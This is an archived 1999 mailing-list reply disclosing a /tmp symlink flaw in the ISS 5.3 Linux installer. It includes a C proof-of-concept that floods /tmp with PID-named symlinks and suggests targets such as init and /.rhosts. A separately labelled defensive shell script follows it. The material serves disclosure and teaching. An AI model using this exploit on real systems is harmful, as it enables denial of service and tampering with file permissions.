On Sat, 20 Feb 1999, Fyodor wrote:

> Today I downloaded the latest trial version of Internet Security Scanner
> for Linux (version 5.3).
>
> The install program (shell script) requires that you be root, even if you
> want to install ISS in your home directory. I decided to edit the script
> to comment out the root-check, and was rather shocked when I saw what they
> are doing in install.iss:
>
> # Only root can pass the next four operations.
> # Yes it's ugly - BUT IT WORKS!
> touch /tmp/.root.$$ >> /dev/null 2>&1
> chmod 600 /tmp/.root.$$ >> /dev/null 2>&1
>
> Obviously this is vulnerable to the standard tmp-symlink problem. And
> they don't even look for the file first, so there is no need to worry
> about exploiting race conditions -- just stick the 65K symlinks in /tmp
> and wait for root to install ISS (you might have to wait a while ;). I've
> tested that you can chmod whatever file you want to 600. This could make
> for an easy DOS, but off the top of my head I don't see much more exploit
> potential.

One other issue that I see with this is:

--- start of stupid 3xPl0i+ example

#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define MINPID 1
#define MAXPID 65535

int main(int argc, char **argv)
{
    char filename[16+1]; /* Assuming MAXPID = 65535 or at least a five digit number */
    struct stat buf;
    int i;

    if(argc != 2) {
        fprintf(stderr, "Usage: %s <file-to-create>\n", argv[0]);
        exit(1);
    }

    /* Plant one symlink per possible PID so /tmp/.root.$$ already exists
       whatever PID the install script gets. */
    memset(filename, 0, sizeof(filename));
    for(i=MINPID; i<=MAXPID; i++) {
        snprintf(filename, 17, "/tmp/.root.%d", i);
        symlink(argv[1], filename);
    }

    /* Wait until the target appears (i.e. root's touch followed the link),
       then remove the links again. */
    memset(filename, 0, sizeof(filename));
    while(stat(argv[1], &buf) == -1);
    for(i=MINPID; i<=MAXPID; i++) {
        snprintf(filename, 17, "/tmp/.root.%d", i);
        unlink(filename);
    }

    printf("%s was created. Filemode = 0%o\n", argv[1], buf.st_mode & 0666);
    if(! access(argv[1], W_OK))
        printf("I suppose you got lucky... (Or ran this as root.)\n");
    else
        printf("Sorry, no write permissions for you...\n");
    exit(0);
}

--- end of stupid 3xPl0i+ example

For those who can't code, or do not see my point: if root has a stupid
umask this vulnerability may be exploited to create, for example, a
world-writeable /.rhosts (I suppose the ISS script does not change umask
to 077, since they do a chmod on the file). No matter what the umask is,
it could easily be made to perform a DoS-attack; what about changing the
permissions on, for example, `which init` to 600... Anyone with a little
imagination could think of other possibilities.

> While this is probably not going to be exploited much (if ever), it really
> concerns me that kindergarten-level security holes are still present in
> current mass market **security** software. Remember that ISS chooses not
> to offer us (or even paying customers!) the source code for their scanner.
> So we have to trust ISS programmers are highly competent and aware of
> secure coding issues. When I find problems like the one above without
> even looking for them, I have to wonder whether this trust is misplaced.

That is the BIG issue here. My exploit example is a possible attack, but
there is still a rather small chance of it being successfully used for
something else than a DoS-attack, since we have to unlink the symlink
before the chmod occurs, and since root must have a stupid umask...

What really does disturb me, just as Fyodor, is that this really basic
kind of security hole exists in a commercial security scanner that is
supposed to find other security flaws on its customers' systems. If I was
an ISS customer I would start to worry just about, now...

> Cheers,
> Fyodor
>
> PS (shameless plug): Version 2.08 of the nmap security scanner is
> available free, with source code, at http://www.insecure.org/nmap/

It's a great tool! :-)

/ Joel Eriksson - Systems / Security administrator, Network engineer,
  Programmer, UNIX Guru
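Added example, not part of Joel's mail or of the ISS installer: a POSIX sh script that keeps the weak "touch a predictable name in /tmp" root check only for contrast, and next to it the two things an install script should do instead: ask the kernel for the effective uid rather than probing the file system, and create any scratch file with mktemp, which opens it with O_EXCL and mode 0600 under an unpredictable name, so a symlink planted in advance is never followed. The function names (weak_root_check, is_root, make_scratch, mode_of) and the iss-install.XXXXXX template are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the original mail or the ISS install script).

# The pattern quoted in the thread, kept only for contrast and never called
# below: a fixed, guessable path in a world-writable directory means chmod
# can be redirected to whatever a pre-planted symlink points at.
weak_root_check() {
    touch "/tmp/.root.$$" >/dev/null 2>&1 && chmod 600 "/tmp/.root.$$" >/dev/null 2>&1
    rm -f "/tmp/.root.$$"
}

# Correct root check: the effective uid comes from the kernel, no file involved.
is_root() {
    [ "$(id -u)" -eq 0 ]
}

# Safe scratch file in a shared directory: mktemp picks a random suffix and
# creates the file itself with O_EXCL and mode 0600, so an existing symlink
# at the chosen name makes the call fail instead of being followed.
# (iss-install.XXXXXX is this example's own template, not the installer's.)
make_scratch() {
    dir="${TMPDIR:-/tmp}"
    f=$(mktemp "$dir/iss-install.XXXXXX") || return 1
    printf '%s\n' "$f"
}

# Permission bits of a file as an octal string; GNU and BSD stat differ in
# their format flags, so try one and fall back to the other.
mode_of() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

main() {
    if is_root; then
        echo "running as root"
    else
        echo "not root: install into \$HOME only"
    fi
    f=$(make_scratch) || return 1
    echo "scratch file $f has mode $(mode_of "$f")"
    rm -f "$f"
}

main
```

Whether or not the script runs as root, the scratch file it creates comes back with mode 600 regardless of the caller's umask, which is the property the quoted `touch`/`chmod` pair was trying to get and could not guarantee.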
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:36:47 PDT